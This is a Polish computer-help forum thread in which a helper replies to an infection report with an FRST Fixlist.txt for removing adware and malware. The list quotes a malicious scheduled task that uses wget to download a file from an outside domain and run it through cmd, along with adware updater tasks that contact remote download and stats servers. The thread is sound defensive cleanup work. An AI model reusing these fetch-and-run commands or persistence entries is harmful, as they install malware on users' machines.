Elektroda.pl
Elektroda.pl
X
CControls
Proszę, dodaj wyjątek www.elektroda.pl do Adblock.
Dzięki temu, że oglądasz reklamy, wspierasz portal i użytkowników.

Chińskie wirusy, czyszczenie komputera, logi FRST

Cracc 07 Sty 2017 14:24 537 6
  • #1 07 Sty 2017 14:24
    Cracc
    Poziom 2  

    Bardzo proszę o pomoc w analizie logów z FRST w celu usnięcia tych dziwnych chińskich programów/wirusów oraz w celu przyspieszenia pracy komputera. W załączniku dodaje pliki z FRST

    0 6
  • CControls
  • #2 07 Sty 2017 14:40
    Kolobos
    Spec od komputerów

    Odinstaluj:
    SpyHunter
    REACHit

    Uruchom system w trybie awaryjnym.

    Obok frst.exe utworz plik Fixlist.txt z zawartoscia:
    CloseProcesses:
    Task: {04EE0B83-5C78-4035-AB42-896EDC2FB2DE} - System32\Tasks\UCBrowserSecureUpdater => C:\Program Files (x86)\UCBrowser\Security\uclauncher.exe <==== UWAGA
    Task: {0CDFE8B0-8D13-4ADF-8A51-F03FFA66126C} - System32\Tasks\Lenovo\REACHit Agent Startup => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2015-12-10] (Lenovo)
    Task: {122A083A-14AB-4F9A-A3A9-A80762EA57BD} - System32\Tasks\{7513FE9C-810A-4461-9854-506254DD48E9} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.109/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {178AE5E5-FD37-41DE-BE69-BECC1CE2A596} - System32\Tasks\{9EE2E8B9-4308-4670-95D6-753BDEC9CE1C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {179F3255-66CC-4F68-BEA2-8FB0FA0ABAC4} - System32\Tasks\{583370F7-583B-49C6-B9EF-B039604D5A6C} => D:\Programy\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe [2016-12-14] ()
    Task: {24B8167C-8B37-46D2-B45E-B531F3059DD0} - System32\Tasks\Origin => C:\Users\Woytek\AppData\Roaming\Origin\update.vbe <==== UWAGA
    Task: {26FF9F56-5F70-48B8-93AA-CB3586C6514A} - System32\Tasks\{41689995-65D8-1ED1-3BDC-6CAD038322A2} => C:\Users\Woytek\AppData\Roaming\PRICEF~1\sync.exe <==== UWAGA
    Task: {27E44C56-B2E6-4DDC-8548-E7BF19052CD4} - System32\Tasks\{C28AC561-E704-4958-9739-57D20BC1E78A} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {2C7E39EC-7E93-48E2-9C6F-14B0FC0F1E4F} - System32\Tasks\{35FA90FA-742D-47FE-93DF-75BD0D341536} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {2C805590-F7E7-432E-BEA5-B280D65BFF34} - System32\Tasks\SpyHunter4Startup => C:\Program Files (x86)\Enigma Software Group\SpyHunter\Spyhunter4.exe
    Task: {2D949739-F3AC-40BE-8808-E3712CDCC658} - System32\Tasks\WoytekConstructionistCurfewV2 => Rundll32.exe SnookersLapp.dll,main 7 1 <==== UWAGA
    Task: {305A0100-CC10-40B4-8D72-4A38A7E7A968} - System32\Tasks\WinTaske => C:\Program Files (x86)\WinTaske\WinTaske\WinTaske.exe <==== UWAGA
    Task: {30EEE981-9001-4B9E-B762-E156645BDF2F} - System32\Tasks\svchost => C:\Users\Woytek\AppData\Local\Temp\yeaplayer51495.exe <==== UWAGA
    Task: {337B70AC-1D65-4AE3-8548-A5736F360E04} - System32\Tasks\{FC9656C1-6F9C-4FCC-B0F9-CB8686F38B90} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603




    Task: {345720E6-B0E3-44D1-8F77-3035FE401B3F} - System32\Tasks\{D6B2CFDB-44DD-4D52-88C7-501A7461013C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.109/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {35B7B3DF-AFC0-4A62-9CFF-FF2F82DEFF4F} - System32\Tasks\UCBrowserUpdaterCore => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {3EDC2F7A-5E52-4E0E-B53B-5A6DB8596DBB} - System32\Tasks\Lenovo\REACHit Agent Update => C:\Program Files (x86)\Lenovo\REACHit\REACHitAgent.exe [2015-12-10] (Lenovo)
    Task: {4251FD0D-B420-4715-AEF2-148FE9E6FC40} - System32\Tasks\{E212474B-5864-4FF1-BAF1-EC6898BAD7F9} => pcalua.exe -a C:\Users\Woytek\Desktop\GTA4RC.exe -d C:\Users\Woytek\Desktop
    Task: {45B89877-5489-4A27-9092-6B656A3A3FDE} - System32\Tasks\osTip => Chrome.exe <==== UWAGA
    Task: {49B9D45A-EB93-4E34-8CF8-444E387452BB} - System32\Tasks\{9D5C7727-5D33-4A97-A356-6DDC794902F6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/abandoninstall?page=tsPlugin
    Task: {4F2857D2-A885-4F8C-AF3A-4D7EF5FE570E} - System32\Tasks\{08CB6F8C-AF04-4B80-A126-644E641267E6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {50938674-9152-485F-893E-96C441BC97CE} - System32\Tasks\{0B259A7D-B32F-4E86-A696-DF9CD2F4CCB5} => pcalua.exe -a D:\Gry\th\setup.exe -d D:\Gry\th
    Task: {51278CCE-FC28-4470-AA65-301FD14FF936} - System32\Tasks\SYSTEM => /R cd "C:\ProgramData" &amp; ping 1.1.1.1 -n 300 -w 1000 &amp; wget -t 0 --retry-connrefused -O dat.bmp hxxp://blockchainin.in/dat.bmp?data=N4ywvkzJaj3JNRgVEkln;Mc;1423679083 &amp; start cmd /R dat.bmp <==== UWAGA
    Task: {57A1656F-9312-4221-93AB-93AF24439E61} - System32\Tasks\{E48A4959-FCEF-417D-8FA9-5D45D606A4AB} => D:\Gry\Frets on Fire\FretsOnFire.exe
    Task: {597E11B0-5E88-40BC-9638-93844BDA0914} - System32\Tasks\{96B9C007-C3FC-4C91-BB54-6848B9205EE0} => pcalua.exe -a "C:\Program Files (x86)\InstallShield Installation Information\{BE4BA698-8533-4F77-9559-C7F3F78C0B05}\setup.exe" -c -runfromtemp -l0x0015 -removeonly
    Task: {63DBC913-C2B3-4953-A25A-051ADCB44B20} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe [2016-01-20] (Adobe Systems Incorporated)
    Task: {6D63230A-7937-4D66-B60F-7BF447457BDC} - System32\Tasks\{33048F79-98E5-462D-9821-032A182471F7} => D:\Gry\simcity\SimCity\SimCity.exe
    Task: {6E9FB41E-C100-49AD-9ACC-651BFA842A09} - System32\Tasks\{1A3C19C2-B017-4001-ABD7-C59060C81CA4} => Chrome.exe hxxp://ui.skype.com/ui/0/7.10.0.101/pl/go/help.faq.installer?LastError=1603
    Task: {6EAE2604-7060-4053-BD4A-3306DC1FA7E6} - System32\Tasks\Opera scheduled Autoupdate 1392137253 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {7553FCC9-0F12-41F8-BEF2-9A1A31114E6A} - System32\Tasks\{4D4E9FC6-C9D7-4820-9A2C-FED58E0CB7E0} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {79FABE18-ECA1-4D6B-A366-1318B1CDBE74} - \Microsoft\Windows\SystemRestore\FreeVPN -> Brak pliku <==== UWAGA
    Task: {7AC2552A-ED65-4209-A49B-0C2C3E86ABB1} - System32\Tasks\{9FE06523-46CE-4F9B-9A20-1FAB13962C04} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {7FD913D8-1056-4FF4-90CE-AFCD9F58A264} - System32\Tasks\{5404577F-27AE-41CA-8DA6-2BDC153337AD} => pcalua.exe -a "D:\Muzyka\counter strike setup.exe" -d D:\Muzyka
    Task: {834D2EAC-CCA2-4AC1-BD11-30B8A6E7C75F} - System32\Tasks\{77C45A42-5354-49A1-88F9-8359E418B52E} => pcalua.exe -a "C:\Users\Woytek\Desktop\Nowy folder\Minecraft.exe" -d "C:\Users\Woytek\Desktop\Nowy folder"
    Task: {853A791F-BDD2-41FE-BA57-5BC045BE91CF} - System32\Tasks\{C5ADA0CE-391B-4E12-BA03-EB01F1F5690F} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {8931B5EE-DBF1-45B9-A66A-68C0A21639BC} - System32\Tasks\{A7A7881D-16A7-4B69-9D93-519E4DBA0916} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {8AD9FFCD-BA8E-4F50-A4AA-D7811852239D} - System32\Tasks\{00F0E5FD-1F1B-4036-BAFF-B1747A4FF70E} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {8D3D1663-3EA1-4EE2-AB3C-2DE3B15A7A85} - System32\Tasks\{21DB3A85-753F-46B3-879C-99620C18836E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/help.faq.installer?LastError=1603
    Task: {911BA723-EEE8-4FC6-AE15-59C4B0A7A291} - System32\Tasks\{64A7C701-66F4-4C4B-8501-A6523E4FC880} => C:\Users\Woytek\Desktop\Install ETS2MP.exe <==== UWAGA
    Task: {91BD113A-8CB5-4209-B70A-43E4E6865B13} - System32\Tasks\FTdownloader V7.0-codedownloader => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-codedownloader.exe <==== UWAGA
    Task: {9223C191-2B88-49A4-996D-3142544C197C} - System32\Tasks\{E8DCADAD-AA99-4A61-97CC-009A883EA957} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {94254283-A550-4852-85B8-8DF1FFDBA146} - System32\Tasks\FTdownloader V7.0-enabler => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-enabler.exe <==== UWAGA
    Task: {95806657-272E-4408-AE0A-1E951DD887B5} - System32\Tasks\{660A067B-E3D9-4CBB-A2E1-504910000AD8} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {9A237410-D996-4FD0-BC03-3D4DDD5E469E} - System32\Tasks\{58A71229-250E-4E9C-B4B4-8C82E538D22C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.0.0.102/pl/go/help.faq.installer?LastError=1603
    Task: {9F3ED200-C00C-4A4A-8718-6F90048F3239} - System32\Tasks\{F6F17348-4F07-4ADF-9A39-777A989C527E} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {A34B2DFC-F8A4-4198-A649-C0C546B84EE1} - System32\Tasks\{36A35404-CF5C-476B-AEEC-BAE18495AF5B} => C:\Users\Woytek\Desktop\Install ETS2MP.exe <==== UWAGA
    Task: {A65E9F7E-5370-4FE6-A605-B56B053421A6} - System32\Tasks\FTdownloader V7.0-chromeinstaller-dev => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-chromeinstaller.exe <==== UWAGA
    Task: {A931DA2D-FBF3-4756-A801-D97B4634A8BF} - System32\Tasks\FTdownloader V7.0-updater => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-updater.exe <==== UWAGA
    Task: {AB2FE784-8DC0-4346-9A5F-953CBCB3FEDB} - System32\Tasks\{0657BE5F-07CD-4597-9EE7-B5C9753530AF} => D:\Gry\Football Manager 2015\fm.exe
    Task: {AEDD8B62-541E-413F-BC22-860F1C46215B} - System32\Tasks\{3943C458-0D46-41DB-87B4-582741C65806} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/en/go/help.faq.installer?LastError=1603
    Task: {B3327154-573D-40D3-856C-7CD2587B85F1} - System32\Tasks\{8D36AB0A-693F-4517-859D-1C7BD49A6DAA} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {B932CEC4-CDC5-4C50-96D9-0F38F84AF349} - System32\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B} => C:\ProgramData\Premium\OptimizerPro1\OptimizerPro1.exe <==== UWAGA
    Task: {BB65E904-4F0F-4F07-B6B4-D4C6D01F7921} - System32\Tasks\UCBrowserUpdater => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: {C72F7031-6DB4-451A-A57A-2B480AAEFC33} - System32\Tasks\{BBF5EC42-7955-4D21-A36A-850B27A2075C} => Chrome.exe hxxp://ui.skype.com/ui/0/7.18.0.112/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {C99D86DB-3E08-4A46-BA0A-7F0D0E59895D} - System32\Tasks\{8BBF9D12-89D4-4761-B337-B2802AE32587} => C:\Program Files (x86)\Tencent\QQPCMgr\11.4.17339.217\Uninst.exe
    Task: {CCB4C6AE-A966-4597-940D-2540BAEBACFA} - \ProtectedSearch\Protected Search -> Brak pliku <==== UWAGA
    Task: {CDE588D8-05A4-449E-AF2F-EB3374AA4F64} - System32\Tasks\FTdownloader V7.0-firefoxinstaller => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-firefoxinstaller.exe <==== UWAGA
    Task: {D2A15F36-59FA-4CEA-AD0B-5F0D1E61D8B9} - System32\Tasks\{96CAAF79-1BA8-4DC4-A98A-DDB7B2E19E84} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {E229DDBB-F315-48B1-9124-58547D75A750} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv => C:\Windows\TEMP\{412D0394-A2BD-489B-9221-1A87F4249642}.exe <==== UWAGA
    Task: {E5711B19-EB8E-440E-884F-AB937272712E} - System32\Tasks\Driver Easy Scheduled Scan => d:\Programy\Easeware\DriverEasy\DriverEasy.exe [2016-10-02] (Easeware)
    Task: {E69F1FA2-26E7-44A8-8D18-90FFE9E4A372} - System32\Tasks\{90A676D9-59E2-4520-8664-195930F30CD8} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/hel...?source=lightinstaller&amp;LastError=1603
    Task: {E799C82D-18B6-40A6-AD87-F6D7D26BF99F} - System32\Tasks\{A34D58E0-00A9-4B20-859F-A854A09CDF79} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.0.104/pl/go/help.faq.installer?LastError=1603
    Task: {E88BC1BA-CB0B-45FC-AFE5-0A28ADCE9062} - System32\Tasks\{DEA4C14C-C080-4D1C-BA6D-2BB20E319993} => C:\Program Files (x86)\Gadu-Gadu 10\gg.exe
    Task: {E8B8EE23-7C9B-4640-A131-A0192CFE0E6E} - System32\Tasks\{FFAD804C-B7B7-448B-A296-146FF5AEFA34} => D:\Gry\PES 2015\PES2015.exe
    Task: {EAC4699D-6C0B-4895-8DA1-7A1F2EC70D1D} - System32\Tasks\{CDDA09C2-D4E2-47D8-9860-DF886B8DA5DA} => D:\Gry\JoWood\Gothic2ZlotaEdycja\System\Gothic2.exe
    Task: {EFA2BA1A-191A-4CBB-941E-B0ACE1D30C81} - System32\Tasks\Opera scheduled Autoupdate 1467742176 => C:\Program Files (x86)\Opera\launcher.exe
    Task: {F1986E0E-5D8B-4899-B503-65589E94DBC8} - System32\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv => C:\Windows\TEMP\{A240721D-5C5F-441F-B5DB-039407BB7F11}.exe <==== UWAGA
    Task: {F42C40A3-DC4C-4AE9-8974-2E8FC772E6EB} - System32\Tasks\Lenovo\Lenovo Customer Feedback Program 64 => C:\Program Files (x86)\Lenovo\Customer Feedback Program\Lenovo.TVT.CustomerFeedback.Agent.exe [2015-07-08] (Lenovo)
    Task: {F6A6A8EE-B59A-4D71-874C-18561B98BD9A} - System32\Tasks\WWE
    Task: {F6ADD75F-4665-490E-908A-CA4F88FCEB7F} - System32\Tasks\{C2F065A3-F525-4FA7-B4C6-9AF29AFC3652} => Chrome.exe hxxp://ui.skype.com/ui/0/6.21.0.104/pl/go/help.faq.installer?LastError=1603
    Task: {FFBC63F0-BD72-4908-A89B-F0CF8E1D34D4} - System32\Tasks\{5FFF0361-4FA0-452B-813A-1C1B2C11D4C6} => Chrome.exe hxxp://ui.skype.com/ui/0/7.13.0.101/pl/go/help.faq.installer?LastError=1603
    Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_HP_rmv.job => C:\Windows\TEMP\{A240721D-5C5F-441F-B5DB-039407BB7F11}.exe <==== UWAGA
    Task: C:\Windows\Tasks\AVG-Secure-Search-Update_JUNE2013_TB_rmv.job => C:\Windows\TEMP\{412D0394-A2BD-489B-9221-1A87F4249642}.exe <==== UWAGA
    Task: C:\Windows\Tasks\Driver Easy Scheduled Scan.job => d:\Programy\Easeware\DriverEasy\DriverEasy.exe
    Task: C:\Windows\Tasks\FTdownloader V7.0-chromeinstaller-dev.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-chromeinstaller.exe Íż/installcrx /agentregpath='FTdownloader V7.0' /extensionfilepath C:\Program Files (x86)\FTdownloader V7.0\49034.crx' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-codedownloader.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-codedownloader.exe Çš/reinstallapp /runfrom=task /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /codedownloaddomain=hxxp:/cr.install-daddy.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-enabler.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-enabler.exe Ʀ/enablebho /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-firefoxinstaller.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-firefoxinstaller.exe Î’/installxpi /agentregpath='FTdownloader V7.0' /extensionfilepath C:\Program Files (x86)\FTdownloader V7.0\49034.xpi' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installerfullversion=1.33.153.1 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /waitforbrowser=300 /extensionid=0402d750-8010-4204-b167-01e83cb6f12d@694f8c69-18e7-4a97-8e6d-448c10f4a0ff.com /extensionversion=0.93 /prefsbranch=a0402d75080104204b16701e83cb6f12d694f8c6918e74a978e6d448c10f4a0ffcom49034 /updateurl=hxxps:/w9u6a2p6.ssl.hwcdn.net/plugin/ff/update/49034.rdf <==== UWAGA
    Task: C:\Windows\Tasks\FTdownloader V7.0-updater.job => C:\Program Files (x86)\FTdownloader V7.0\FTdownloader V7.0-updater.exe Çľ/runupdater /agentregpath='FTdownloader V7.0' /appid=49034 /srcid='000863' /subid='0' /zdata='0' /bic=F80CF60048F44D66A3F263ED798BB003IE /verifier=92ee4b4866421ca855a7b1cb300ddc56 /installerversion=1_33_153 /installationtime=1390218143 /statsdomain=hxxp:/stats.srvstatsdata.com /errorsdomain=hxxp:/errors.srvstatsdata.com /geoserviceurl=hxxp:/ipgeoapi.com/ /updatejsondomain=hxxp:/update.srvstatsdata.com /updaterversion=2 /monetizationdomain=hxxp:/stats.syncstatsdata.com <==== UWAGA
    Task: C:\Windows\Tasks\OptimizerPro1UpdaterTask{08EBDEA9-C622-4E1A-88D6-CC82F934351B}.job => C:\ProgramData\Premium\OptimizerPro1\OptimizerPro1.exe J/schedule /profilepath C:\ProgramData\Premium\OptimizerPro1\profile.ini <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdater.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\UCBrowserUpdaterCore.job => C:\Program Files (x86)\UCBrowser\Application\update_task.exe <==== UWAGA
    Task: C:\Windows\Tasks\{41689995-65D8-1ED1-3BDC-6CAD038322A2}.job => C:\Users\Woytek\AppData\Roaming\PRICEF~1\sync.exe <==== UWAGA
    2016-11-17 11:07 - 2016-11-17 11:07 - 00253352 _____ () c:\users\woytek\appdata\roaming\360bizhi\lpi\wpsvc.dll
    AlternateDataStreams: C:\ProgramData:NT [40]
    AlternateDataStreams: C:\ProgramData:NT2 [346]
    AlternateDataStreams: C:\Windows\system32\drivers:ucdrv-x64.sys [23652]
    AlternateDataStreams: C:\Windows\system32\drivers:x64 [1479458]
    AlternateDataStreams: C:\Windows\system32\drivers:x86 [1205026]
    AlternateDataStreams: C:\Users\All Users:NT [40]
    AlternateDataStreams: C:\Users\All Users:NT2 [346]
    AlternateDataStreams: C:\Users\Woytek:Heroes & Generals [38]
    AlternateDataStreams: C:\ProgramData\Application Data:NT [40]
    AlternateDataStreams: C:\ProgramData\Application Data:NT2 [346]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\ProgramData\Dane aplikacji:NT2 [346]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT [40]
    AlternateDataStreams: C:\ProgramData\MTA San Andreas All:NT2 [346]
    AlternateDataStreams: C:\ProgramData\wget.exe:$CmdTcID [64]
    AlternateDataStreams: C:\Users\Woytek\Dane aplikacji:NT [40]
    AlternateDataStreams: C:\Users\Woytek\Dane aplikacji:NT2 [346]
    AlternateDataStreams: C:\Users\Woytek\AppData\Roaming:NT [40]
    AlternateDataStreams: C:\Users\Woytek\AppData\Roaming:NT2 [346]
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\QQPCRTP => ""="service"
    HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\QQPCRTP => ""="service"
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\Software\Classes\regfile: regedit.exe "%1" <===== UWAGA
    Hosts:
    FirewallRules: [{56E20A04-36F2-4928-842A-C7576E9661F5}] => C:\Program Files (x86)\UCBrowser\Application\UCBrowser.exe
    FirewallRules: [{21AF4C6E-ACB8-49D0-8B09-4D027C0D59CE}] => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [{81F7C950-726E-4F2C-A9F4-D0C559DD04FB}] => C:\Program Files (x86)\LuDaShi\ComputerZTray.exe
    FirewallRules: [TCP Query User{064F3AF1-83D3-4001-A093-76C54881EEDD}C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe] => C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe
    FirewallRules: [UDP Query User{872D072C-0D0F-43C9-92D8-2AF38F85B611}C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe] => C:\users\woytek\appdata\roaming\360bizhi\360wpsrv.exe
    Winlogon\Notify\WB: d:\Programy\Stardock\WindowBlinds\fast64.dll [X]
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [osmsg] => C:\ProgramData\WindowsMsg\chrome.exe [7204864 2016-12-06] ()
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [ComputerZ-Tray] => "C:\Program Files (x86)\LuDaShi\ComputerZTray.exe" /autorun
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Run: [360wp-srv] => C:\Users\Woytek\AppData\Roaming\360bizhi\360wpsrv.exe [1636264 2017-01-05] (360.cn)
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: I - I:\Autorun.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {211cf585-f2df-11e1-ae40-902b34417a90} - J:\setup\rsrc\Autorun.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {7dea8d2a-609a-11e3-8d07-902b34417a90} - K:\Startme.exe
    HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\MountPoints2: {bd4f10b0-f786-11e3-b1d3-902b34417a90} - I:\autorun.exe
    HKU\S-1-5-18\...\Run: [] => 0
    HKU\S-1-5-18\...\RunOnce: [SPReview] => C:\Windows\System32\SPReview\SPReview.exe [301568 2013-03-20] (Microsoft Corporation)
    GroupPolicy: Ograniczenia <======= UWAGA
    CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <======= UWAGA
    ProxyServer: [S-1-5-21-3510665200-3135124157-2897185096-1000] => http=127.0.0.1:13897
    RemoveProxy:
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Ograniczenia <======= UWAGA
    SearchScopes: HKU\.DEFAULT -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\.DEFAULT -> {483830EE-A4CD-4b71-B0A3-3D82E62A6909} URL =
    SearchScopes: HKU\.DEFAULT -> {80c554b9-c7f8-4a21-9471-06d606da78a2} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
    SearchScopes: HKU\S-1-5-19 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-19 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\S-1-5-20 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.google.com/search?q={searchTerms}
    SearchScopes: HKU\S-1-5-20 -> {425ED333-6083-428a-92C9-0CFC28B9D1BF} URL = hxxp://www.v9.com/web?type=ds&ts=14391972...4ca636442c77f076b2fg3z2c0t4gat4m5w2e9o&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3510665200-3135124157-2897185096-1000 -> {0191A6B0-1154-4C22-9182-23A95BBE92D9} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
    BHO: Brak nazwy -> {6E727987-C8EA-44DA-8749-310C0FBE3C3E} -> Brak pliku
    BHO-x32: Brak nazwy -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> Brak pliku
    FF Extension: (xRocket Toolbar) - C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\Extensions\arthurj8283@gmail.com [2016-05-01] [Brak podpisu cyfrowego]
    FF SearchPlugin: C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\searchplugins\google-.xml [2016-02-10]
    FF HKLM-x32\...\Firefox\Extensions: [arthurj8283@gmail.com] - C:\Users\Woytek\AppData\Roaming\Mozilla\Firefox\Profiles\qhr2alaj.default\extensions\arthurj8283@gmail.com
    FF HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Firefox\Extensions: [{4539DA6C-FD3F-3DEE-48C3-CECC670FA24F}] - C:\Program Files (x86)\best-markit\161.xpi => nie znaleziono
    FF HKU\S-1-5-21-3510665200-3135124157-2897185096-1000\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi
    FF Extension: (McAfee Security Scan Plus) - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi [2014-04-04] [Brak podpisu cyfrowego]
    FF Plugin-x32: @qq.com/npAndroidAssistant -> C:\Program Files (x86)\Common Files\Tencent\QQPhoneManager\2.0.201.3192\npQQPhoneManagerExt.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-3510665200-3135124157-2897185096-1000: pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [Brak pliku]
    FF Plugin HKU\S-1-5-21-3510665200-3135124157-2897185096-1000: ubisoft.com/uplaypc -> d:\gry\Ubisoft\Ubisoft Game Launcher\npuplaypc.dll [Brak pliku]
    CHR Extension: (Quick Searcher) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\acoiihnnfofnpbnofdcgcapbjlcopifa [2016-05-02]
    CHR Extension: (Adblock Super) - C:\Users\Woytek\AppData\Local\Google\Chrome\User Data\Default\Extensions\knebimhcckndhiglamoabbnifdkijidd [2015-09-14]
    da [2015-08-07]
